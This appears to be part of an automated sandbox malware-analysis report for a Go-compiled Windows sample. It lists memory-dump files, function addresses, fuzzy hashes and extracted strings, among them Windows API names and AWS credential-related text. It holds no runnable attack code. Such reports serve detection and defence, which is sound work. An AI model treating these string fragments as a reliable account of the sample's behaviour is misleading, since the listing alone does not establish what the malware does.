Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64$1$freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not o$runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetN$s.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: wai$s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetNtVersionNumbers$s.allocCount= key size wrongnil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod
API String ID: 0-428273022
Opcode ID: 6ed8e45ce928945b7dd39f38407620d090a7db5019ef972d7ff61796e2cab669
Instruction ID: f79ded93e64563c954e13f97046eee42dee012f08357f2f89493d1c7d46cfc38
Opcode Fuzzy Hash: 6ed8e45ce928945b7dd39f38407620d090a7db5019ef972d7ff61796e2cab669
Instruction Fuzzy Hash: F851F3744193549AC344EF65C19527EBBE0FF88714F80889EF8D887282E778D985EB63

Function 00B42A30 Relevance: 8.9, Strings: 7, Instructions: 123COMMON

Download Yara Rule

Strings

etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor, xrefs: 00B42BCD
types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS, xrefs: 00B42BA3
not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL, xrefs: 00B42B40
runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefractional secondCanSet() is falseEnvSe, xrefs: 00B42AED
runtime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Type.ConvertibleToPSSWithSHA256PSSWithSHA384PSSWithSHA512Ed25519tls: server chose an unconfigu, xrefs: 00B42C13
., xrefs: 00B42C1C
base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTa, xrefs: 00B42B16

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS$ base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTa$ etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor$ not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL$.$runtime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Type.ConvertibleToPSSWithSHA256PSSWithSHA384PSSWithSHA512Ed25519tls: server chose an unconfigu$runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefractional secondCanSet() is falseEnvSe
API String ID: 0-2126895504
Opcode ID: 4540df47adb9ecfd2d6c6a1d5e286b073419b09e71ae71e8ef285ecbc09b5303
Instruction ID: c8f89c218b0f99ffcb7e6689549210529be83908f4ddcc8b7a18e5d30a0106cc
Opcode Fuzzy Hash: 4540df47adb9ecfd2d6c6a1d5e286b073419b09e71ae71e8ef285ecbc09b5303
Instruction Fuzzy Hash: 8451E6B45597058FC714EF64C485A9ABBE0FF88304F8089ADF88987351E734D984EF92

Function 00B00DE0 Relevance: 7.7, Strings: 6, Instructions: 191COMMON

Download Yara Rule

Strings

objgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-0, xrefs: 00B01044
runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflo, xrefs: 00B00F85
marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp.parampanic during , xrefs: 00B0107F
greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has, xrefs: 00B01095
base of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcall, xrefs: 00B0101E
#, xrefs: 00B0109E

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: #$base of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcall$greyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has$marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not foundruntime: g0 stack [panic during mallocpanic holding locksmissing deferreturnunexpected gp.parampanic during $objgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-0$runtime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflo
API String ID: 0-723661674
Opcode ID: fa8f0dc7b03c0826717318aebb2f9859b0edc40addee582f5335b83230c09927
Instruction ID: 88e78888be40478a033aea104817a6fc04fd34651f8914aa4d633b802c4d5284
Opcode Fuzzy Hash: fa8f0dc7b03c0826717318aebb2f9859b0edc40addee582f5335b83230c09927
Instruction Fuzzy Hash: B28149746097458FC714EF28C090B6ABBE0FF89704F8589ADE8888B392D734D945DF92

Function 00B24F00 Relevance: 7.6, Strings: 6, Instructions: 114COMMON

Download Yara Rule

Strings

in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/output errormultihop, xrefs: 00B25061
preempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckruntime.gopanicadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDevic, xrefs: 00B2507C
%, xrefs: 00B25040
runtime: unexpected SPWRITE function all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typetimezone hour outside of range [0,23]failed to load environment config, %vUnsubscribeServiceChangeNotificationsg, xrefs: 00B25037
bad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOf, xrefs: 00B250B4
preempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiontrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage , xrefs: 00B25092

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/output errormultihop$%$bad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOf$preempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckruntime.gopanicadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDevic$preempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiontrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage $runtime: unexpected SPWRITE function all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typetimezone hour outside of range [0,23]failed to load environment config, %vUnsubscribeServiceChangeNotificationsg
API String ID: 0-699477509
Opcode ID: 7684e20c8d29da1cb294303362970f610aa36f5c3670cd2694b48e3be908fcef
Instruction ID: 317901022939ea9e8b5d567daa266499a05cb8338476729922b13caeeae6cff3
Opcode Fuzzy Hash: 7684e20c8d29da1cb294303362970f610aa36f5c3670cd2694b48e3be908fcef
Instruction Fuzzy Hash: 8E51E2B46087449FC314EF64D195A6ABBE4FF88704F4188ADE4C98B352E734E884DF92

Function 00AF5AB0 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

objgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-0, xrefs: 00AF5C21
checkmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscall, xrefs: 00AF5C5C
runtime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of me, xrefs: 00AF5B8C
runtime: checkmarks found unexpected unmarked object obj=x-amz-copy-source-server-side-encryption-customer-key-md5sync: WaitGroup misuse: Add called concurrently with Waittls: Ed25519 public keys are not supported before TLS 1.2received record with version %x , xrefs: 00AF5B53
base of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcall, xrefs: 00AF5BFB
9, xrefs: 00AF5B5C

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
